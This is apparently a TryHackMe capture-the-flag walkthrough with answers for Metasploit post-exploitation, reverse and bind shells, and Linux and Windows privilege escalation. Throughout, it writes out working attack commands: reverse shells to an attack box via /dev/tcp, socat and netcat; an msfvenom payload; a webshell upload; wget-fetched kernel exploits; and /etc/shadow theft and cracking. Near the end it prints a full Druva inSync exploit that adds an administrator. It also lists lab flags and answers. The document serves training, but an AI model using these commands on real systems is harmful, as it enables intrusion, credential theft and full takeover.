# execution permission.
# In the meterpeter Session -- 
run post/linux/gather/hashdump
claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002::/home/claire:/bin/sh
Ans - $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

Metasploit: Meterpreter

Post-Exploitation Challenge

Steps in msfconsole

use exploit/windows/smb/psexec
set RHOSTS TARGET_IP
set LHOSTS INTERNAL_IP
set SMBUser ballen
set SMBPass Password1
exploit

What is the computer name?

sysinfo
Ans - ACME-TEST

What is the target domain?

Also in the sysinfo

Ans - FLASH 

What is the name of the share likely created by the user?

run post/windows/gather/enum_shares
Ans - speedster

What is the NTLM hash of the jchambers user?

# We need to migrate to lsass process
pid 
ps 
migrate 764
hashdump
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
Ans - 69596c7aa1e8daee17f8e78870e25a5c

What is the cleartext password of the jchambers user?

Put the NTLM hash on Crackstation.net

Trustno1

Where is the “secrets.txt” file located?

search -f secrets.txt
Ans - c:\Program Files (x86)\Windows Multimedia Platform

What is the Twitter password revealed in the “secrets.txt” file?

KDSvbsw3849

Where is the “realsecret.txt” file located?

search -f realsecret.txt
c:\inetpub\wwwroot

What is the real secret?

The Flash is the fastest man alive

Privilege Escalation

What the Shell?

Types of Shell

Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

R

You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

N

When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

T

Netcat

Which option tells netcat to listen?

-l

How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

nc 10.10.10.11 8080

Netcat Shell Stabilisation

Technique 1:

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg
reset # To restart shell echo

Technique 2:

sudo apt install rlwrap # On Attacker
rlwrap nc -lvnp <port>
stty raw -echo; fg

Technique 3: Socat

How would you change your terminal size to have 238 columns?

stty cols 238

What is the syntax for setting up a Python3 webserver on port 80?

sudo python3 -m http.server 80

Socat

How would we get socat to listen on TCP port 8080?

TCP -L:8080

Socat Encrypted Shells

What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called “encrypt.pem”

socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Common Shell Payloads

mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

The command first creates a named pipe at /tmp/f. It then starts a netcat listener, and connects the input of the listener to the output of the named pipe. The output of the netcat listener (i.e. the commands we send) then gets piped directly into sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe, thus completing the circle

What command can be used to create a named pipe in Linux?

mkfifo

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

msfvenom

Which symbol is used to show that a shell is stageless?

_

What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell

msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell.elf LHOST=10.10.10.5 LPORT=443

Metasploit multi/handler

What command can be used to start a listener in the background?

exploit -j

If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

session 10

Practice and Examples

Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine.

Ans -

1. Go to /usr/share/webshells/php and copy the php-reverse-shell.php to your home directory
2. Update the php-reverse-shell.php with your TryHackMe Internal IP Address and whatever port you like.
3. Open up the netcat listener on the port mentioned in the script.

nc -lnvp <PORT>

1. Go to the Linux Server IP Address in Firefox and upload the updated PHP reverse shell file and click on the file after submitting it.

Privilege Escalation

Enumeration

What is the hostname of the target system?

wade7363

What is the Linux kernel version of the target system?

**3.13.0-24-generic**

What Linux is this?

Ubuntu 14.04 LTS

What version of the Python language is installed on the system?

2.7.6

What vulnerability seem to affect the kernel of the target system? (Enter a CVE  number)

CVE-2015-1328

Privilege Escalation: Kernel Exploits

Once the Linux machine is spun up run

uname -a

To find the Linux kernel version which is 3.13.0-24-generic. With a google search we can find the exploit at https://www.exploit-db.com/exploits/37292. Download the exploit C file in your attack box and compile it. Start a Python HTTP server to serve the file to the victim Ubuntu machine.

gcc 37292.c -o ofs
python -m http.server 8000

The user karen doesn’t have the privilege to write in home so do wget in /tmp directory. Then we give the binary execution permission and run it.

cd /tmp
wget http://ATTACKBOXIP:8000/ofs
chmod +x ofs
./ofs

Once we get root the flag1.txt file is in

cat /home/matt/flag1.txt
THM-28392872729920

Privilege Escalation: Sudo

How many programs can the user “karen” run on the target system with sudo rights?

Run sudo -l command

3

What is the content of the flag2.txt file?

sudo find / -name flag2.txt
less /home/ubuntu/flag2.txt
THM-402028394

How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

You can find the details on gtfobins https://gtfobins.github.io/gtfobins/nmap/

sudo nmap --interactive

What is the hash of frank’s password?

sudo less /etc/shadow
$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1

Privilege Escalation: SUID

Which user shares the name of a great comic book writer?

You can find users in /etc/passwd file

gerryconway

What is the password of user2?

When we run find / -type f -perm -04000 -ls 2>/dev/null In Ubuntu we can see base64 has the SUID bit set and we can check GTFObins to find how to escalate our privilege. Get the shadow and password files and using a Python Server get it to your attack back to run unshadow on them.

cd /tmp
base64 "/etc/shadow" | base64 --decode > shadow.txt
cat /etc/passwd > passwd.txt
python3 -m http.server 8000

In your attack box

unshadow passwd.txt shadow.txt > passwords.txt
john passwords.txt

Password1

What is the content of the flag3.txt file?

base64 "/home/ubuntu/flag3.txt" | base64 --decode
THM-3847834

Privilege Escalation: Capabilities

Run getcap -r / 2>/dev/null on the victim machine

Vim has setuid capabilities.

How many binaries have set capabilities?

6

What other binary can be used through its capabilities?

view

What is the content of the flag4.txt file?

Use the command listed below to get root with Capabilities. Then read the file in /home/ubuntu/flag4.txt. I was getting errors with the command in GTFObins so I updated it from :py to :python3.

vim -c ':python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' 
THM-9349843

Privilege Escalation: Cron Jobs

How many user-defined cron jobs can you see on the target system?

cat /etc/crontab
4

What is the content of the flag5.txt file?

Give the backup.sh file execution permission and edit it.

chmod + /home/karen/backup.sh
vi backup.sh

Inside the file

#!/bin/bash

bash -i >& /dev/tcp/AttackBoxIP/6666 0>&1

On the attack box

nc -nlvp 6666

# Once you get root reverse shell
cat /home/ubuntu/flag5.txt

What is Matt’s password?

You can get the /etc/shadow and /etc/passwd files and store them in your attack box and unshadow them and run johntheripper on them to find the password.

unshadow passwd.txt shadow.txt > passwords.txt
john passwords.txt
123456 # Matt's Password

Privilege Escalation: PATH

What is the odd folder you have write access for?

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
/home/murdoch

We add the /home/murdoch to the path and create a thm binary that opens up a shell.

export PATH=/home/murdoch:$PATH
echo "/bin/bash" > thm
chmod 777 thm

The ./test executable reads the thm file so just run it and you will get root.

What is the content of the flag6.txt file?

cat /home/matt/flag6.txt
THM-736628929

Privilege Escalation: NFS

How many mountable shares can you identify on the target system?

3

How many shares have the “no_root_squash” option enabled?

3

What is the content of the flag7.txt file?

THM-89384012

Capstone Challenge

I tried the PATH method but that didn’t work for me and I was still getting a shell as Leonard. Then I used the SUID method as base64 has the SUID bit set.

Use the same technique we used in the challenge and read /etc/passwd and /etc/shadow and then run john on it to get the passwords.

What is the content of the flag1.txt file?

THM-42828719920544

What is the content of the flag2.txt file?

THM-168824782390238

Windows Privilege Escalation

Windows Privilege Escalation

Users that can change system configurations are part of which group?

Administrators

The SYSTEM account has more privileges than the Administrator user (aye/nay)

aye

Harvesting Passwords from Usual Spots

Connect to the Windows machine using a RDP Client (Remmina) and the provided credentials.

A password for the julia.jones user has been left on the Powershell history. What is the password?

Run the command **%**userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt in CMD

ZuperCkretPa5z

A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?

Run the command

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

098n0x35skjD3

There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.

Run the command in CMD

runas /savecred /user:mike.katz cmd.exe
# Once popping a shell as mike.katz
type C:\Users\mike.katz\Desktop\flag.txt
THM{WHAT_IS_MY_PASSWORD}

Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?

Run the command in CMD

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
CoolPass2021

Other Quick Wins

Follow the guide provided and once you run the scheduled task you will get a reverse shell in NC.

Run

type C:\Users\taskusr1\Desktop\flag.txt
THM{TASK_COMPLETED}

Abusing Service Misconfigurations

Get the flag on svcusr1’s desktop.

THM{AT_YOUR_SERVICE}

Get the flag on svcusr2’s desktop.

THM{QUOTES_EVERYWHERE}

Get the flag on the Administrator’s desktop.

THM{INSECURE_SVC_CONFIG}

Abusing Dangerous Privileges

Get the flag on the Administrator’s desktop.

I used the SeImpersonate / SeAssignPrimaryToken method to get the flag from the Administrator Desktop. Once you get a reverse shell in your NC listener from the web shell use this command -

type C:\Users\Administrator\Desktop\flag.txt
THM{SEFLAGPRIVILEGE}

Abusing vulnerable software

Get the flag on the Administrator’s desktop.

Edit the C:\tools\Druva_inSync_exploit.txt and update the $cmd variable

# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
# Date: 2020-12-03
# Exploit Author: 1F98D
# Original Author: Matteo Malvica
# Vendor Homepage: druva.com
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
# Version: 6.6.3
# Tested on: Windows 10 (x64)
# CVE: CVE-2020-5752
# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.

$ErrorActionPreference = "Stop"

$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

Open a PowerShell window and paste this there and run it. Open a Command Prompt as an Administrator and put the credentials of pwnd user. Run the following command to get the flag.

type C:\Users\Administrator\Desktop\flag.txt
THM{EZ_DLL_PROXY_4ME}

Fin. 🙂